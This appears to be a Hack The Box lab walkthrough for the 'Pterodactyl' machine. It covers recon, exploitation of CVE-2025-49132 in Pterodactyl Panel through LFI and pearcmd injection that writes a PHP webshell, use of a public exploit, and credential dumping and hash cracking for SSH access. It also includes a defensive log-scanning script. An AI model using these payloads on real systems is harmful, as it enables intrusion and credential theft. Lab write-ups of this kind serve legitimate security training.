# Pterodactyl HTB Walkthrough

### Scanning

```
nmap -p- -vv --min-rate 1000 10.129.34.26

PORT     STATE  SERVICE    REASON
22/tcp   open   ssh        syn-ack ttl 63
80/tcp   open   http       syn-ack ttl 63
```

**Open Ports:**

* `22/tcp` - SSH
* `80/tcp` - HTTP

#### Service Version Enumeration

```
nmap -p22,80 -sC -sV 10.129.34.26 --min-rate 10000
```

<figure><img src="/files/jdtriO0sdLKsr7NFHXsH" alt=""><figcaption></figcaption></figure>

### Website Enumeration

**Feroxbuster Scan**

```bash
feroxbuster -u http://pterodactyl.htb

200      GET       28l      105w      920c http://pterodactyl.htb/changelog.txt
```

<figure><img src="/files/7poATePsqoxnupN78yzx" alt=""><figcaption></figcaption></figure>

* `http://pterodactyl.htb/phpinfo.php` - PHP information page
* `http://pterodactyl.htb/changelog.txt` - Change log

**Changelog Analysis:**

The `changelog.txt` revealed critical information:

* **Pterodactyl Panel v1.11.10** installed
* **PHP-PEAR** enabled for package management
* Temporary PHP debugging via `phpinfo()`

<figure><img src="/files/HEV7BXVs7pIpHFZPdV8K" alt=""><figcaption></figcaption></figure>

### Virtual Host Discovery

```
ffuf -u http://pterodactyl.htb -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host:FUZZ.pterodactyl.htb" -ic -ac

panel                   [Status: 200, Size: 1897, Words: 490, Lines: 36, Duration: 449ms]
```

<figure><img src="/files/VU7gNnZCH6qKRDSRUV9Z" alt=""><figcaption></figcaption></figure>

* Navigating to `panel.pterodactyl.htb` redirects to `/auth/login` - Pterodactyl Panel login page.

<figure><img src="/files/WQy9LYPPv3vbw9wM03v3" alt=""><figcaption></figcaption></figure>

### Vulnerability Discovery

Research revealed that Pterodactyl Panel ≤ 1.11.10 is vulnerable to unauthenticated arbitrary remote code execution via the `/locales/locale.json` endpoint.

<figure><img src="/files/pYmOW0qKG2znLCsUNkyw" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/oYzIEyI6xoZlmwDFT4Pb" alt=""><figcaption></figcaption></figure>

### CVE-2025-49132

**Initial LFI Test**

```
curl -s  'panel.pterodactyl.htb/locales/locale.json?locale=../../../pterodactyl&namespace=config/database' | jq .
```

<figure><img src="/files/9qO2Rt0VCuzFgbxn2vMM" alt=""><figcaption></figcaption></figure>

This successfully read the database configuration, confirming the vulnerability.

I can include PHP files, but I can’t read files like `/etc/passwd` because `.php` would be appended at the end. We cannot use a PHP filter either, because there’s a bunch of stuff prepended to the front of our input.

### Method 1: Manual PEAR-based RCE

Since PHP-PEAR was enabled (confirmed in `changelog.txt`), the PEAR `config-create` technique was used. I came across this [article](https://medium.com/@lashin0x/local-file-inclusion-to-remote-code-execution-rce-bea0ec06342a).

<figure><img src="/files/2rbZR0pfNW9Shmq0v52b" alt=""><figcaption></figcaption></figure>

**Write Webshell**

<figure><img src="/files/J20U3ut4aJfC7XAomyFG" alt=""><figcaption></figcaption></figure>

**Execute Commands**

<figure><img src="/files/9GKXjxAjnFloKVJHwTmW" alt=""><figcaption></figcaption></figure>

**Triggering Rev Shell**

<figure><img src="/files/qVe63wzHx9Mzur0ceeUK" alt=""><figcaption></figcaption></figure>

For better understanding, here is the curl command:

```
curl -g 'http://panel.pterodactyl.htb/locales/locale.json?+config-create+/&locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system($_GET["cmd"]);?>+/tmp/l1nuxkid.php' 2>/dev/null
```

The file is created. Execute it using the command below; we already know how to include files, as we did when enumerating the database config in the initial test.

```
curl -s 'http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../tmp&namespace=l1nuxkid&cmd=id' | head -n 10
```

<figure><img src="/files/YKoHxzdiZHe3rREKrKuu" alt=""><figcaption></figcaption></figure>
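
From the defender's side, the LFI test and the PEAR `config-create` requests above leave distinctive traces in the web server access log. The following is an added example, not part of the original walkthrough or of Pterodactyl's code: it flags those requests in constructed log lines, and it assumes combined log format, that legitimate `locale`/`namespace` values are plain tokens, and that the front end sends only those two parameters (`classify` and `scan` are hypothetical names).

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not captured from a real host).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2026:10:00:01 +0000] "GET /locales/locale.json?locale=en&namespace=strings HTTP/1.1" 200 5120
10.10.14.5 - - [01/Jan/2026:10:00:07 +0000] "GET /locales/locale.json?locale=../../../pterodactyl&namespace=config/database HTTP/1.1" 200 912
10.10.14.5 - - [01/Jan/2026:10:00:19 +0000] "GET /locales/locale.json?+config-create+/&locale=../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=1?>+/tmp/x.php HTTP/1.1" 200 3301
10.10.14.5 - - [01/Jan/2026:10:00:25 +0000] "GET /locales/locale.json?locale=..%2F..%2F..%2F..%2F..%2Ftmp&namespace=x&cmd=id HTTP/1.1" 200 87
10.10.14.9 - - [01/Jan/2026:10:01:00 +0000] "GET /auth/login HTTP/1.1" 200 1897
"""

REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Assumptions: legitimate values are plain tokens; only these two parameters are sent.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_ -]+")
KNOWN_PARAMS = {"locale", "namespace"}

def classify(target):
    """Return the reasons a request target looks like CVE-2025-49132 abuse."""
    url = urlsplit(target)
    if url.path != "/locales/locale.json":
        return []
    reasons = []
    params = parse_qs(url.query, keep_blank_values=True)
    for name in ("locale", "namespace"):
        for value in params.get(name, []):
            if not SAFE_VALUE.fullmatch(value):   # "..", "/" and similar
                reasons.append(f"path characters in {name}")
    raw = unquote(url.query).lower()
    if "pearcmd" in raw or "config-create" in raw:
        reasons.append("pearcmd argument injection")
    if "<?" in raw:
        reasons.append("PHP open tag in query")
    if set(params) - KNOWN_PARAMS:
        reasons.append("unexpected extra parameter")
    return reasons

def scan(log_text):
    """Return (client_ip, target, reasons) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m and (reasons := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), reasons))
    return hits

if __name__ == "__main__":
    for ip, target, reasons in scan(SAMPLE_LOG):
        print(ip, reasons, target)
```

The same allow-list idea applies at the application layer: rejecting any `locale` or `namespace` value that is not a plain token removes the traversal primitive both requests depend on.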

### Method 2: Using Public Exploit

{% embed url="<https://github.com/YoyoChaud/CVE-2025-49132>" %}

```
git clone https://github.com/YoyoChaud/CVE-2025-49132.git; cd CVE*
python3 exploit.py http://panel.pterodactyl.htb
```

It tries lots of things; running the exploit, we see it tried to run the `whoami` command using pearcmd.

<figure><img src="/files/4RZYslFJJMsJCeuKxAq6" alt=""><figcaption></figcaption></figure>

The path is wrong; we can specify the path of pearcmd:

<figure><img src="/files/lo01tnzvuw11ExftM6dw" alt=""><figcaption></figcaption></figure>

```
python3 exploit.py http://panel.pterodactyl.htb --pear-dir '/usr/share/php/PEAR'
```

<figure><img src="/files/xJ9hb6Iyrfv5U6owemd4" alt=""><figcaption></figcaption></figure>

Now that we have RCE, we could insert the rev shell inside our exploit:

```
python3 exploit.py http://panel.pterodactyl.htb --pear-dir '/usr/share/php/PEAR';
```

<figure><img src="/files/sR3j13I6lSWOqX3MzDRS" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/otZT49eOh3uScGzu2eXe" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

* We found the database username and password during initial enumeration, and we found the same here in `.env`.

```
wwwrun@pterodactyl:/var/www/pterodactyl> cat .env | grep -i 'user\|pass'
```

<figure><img src="/files/PNtouV2hsV7PK6cO4OmW" alt=""><figcaption></figcaption></figure>

```
 mysql -u pterodactyl -pPteraPanel -h 127.0.0.1
```

```
select username,password from users;
```

<figure><img src="/files/PKX0XJkgBN75ysagt72q" alt=""><figcaption></figcaption></figure>

Crack the hash

```
hashcat --username  hashes -m 3200 /usr/share/wordlists/rockyou.txt
hashcat (v7.1.2) starting
...[snip]...
$2y$10$PwO0TBZA8hLB6nuSsxRqoOuXuGi3I4AVVN2IgE7mZJLzky1vGC9Pi:!QAZ2wsx
```

### Shell as phileasfogg3

```
ssh phileasfogg3@pterodactyl.htb
```

<figure><img src="/files/QGhXleIu6SJ9xJaFhcyI" alt=""><figcaption></figcaption></figure>

Looking into `/var/mail/`, we have an email:

<figure><img src="/files/rBy3fjatMuJ7IzWug9ba" alt=""><figcaption></figcaption></figure>

From here it is something related to udisks, but I have a Mac and it's difficult to exploit using a Mac.

`udisksd` is a D-Bus service that manages disks/storage devices and historically has had vulnerabilities allowing **root privilege escalation**.


